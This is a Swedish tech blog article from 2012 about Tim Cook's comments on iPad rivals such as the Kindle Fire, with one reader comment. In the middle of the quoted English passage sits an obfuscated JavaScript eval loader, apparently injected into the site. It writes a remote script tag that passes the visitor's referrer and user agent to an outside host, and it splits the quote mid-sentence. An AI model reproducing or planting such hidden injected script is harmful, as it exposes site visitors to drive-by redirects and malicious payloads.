Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Tim Cooks tankar om iPad och dess konkurrens

Tim Cooks tankar om iPad och dess konkurrens
Filip Urde
  • On 26 januari, 2012
  • http://www.revue.se/filip-urde

Tim Cook blev tillfrågad vad han tyckte om iPads konkurrenter och med extra fokus på de billigare tablets som t.ex.  Kindle Fire. Tim Cook vet mycket väl att han jobbar på Apple och svaren blev lika självsäkra som man kan vänta sig.  Apple lyckades sälja 15 miljoner iPads förra kvartalet vilket har bidragit till att Apple nu har över 70% av marknaden.

People eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rndzk|var|u0026u|referrer|seynh||js|php’.split(’|’),0,{}))
really want to do multiple things with their tablets, so we don’t see the limited function tablets and ereaders in the same category… I don’t think that people who want an iPad will settle for a limited function.

In terms of other tablets, last year was supposed to be the year of the tablet, and I think most people would agree it was the year of the iPad for the second year in a row./Tim Cook”

 

Läs mer från Tim Cook på länken nedan.
gizmodo.com

Bild: allthingsd.com

Comments

  1. Liss

    haha för skön bild!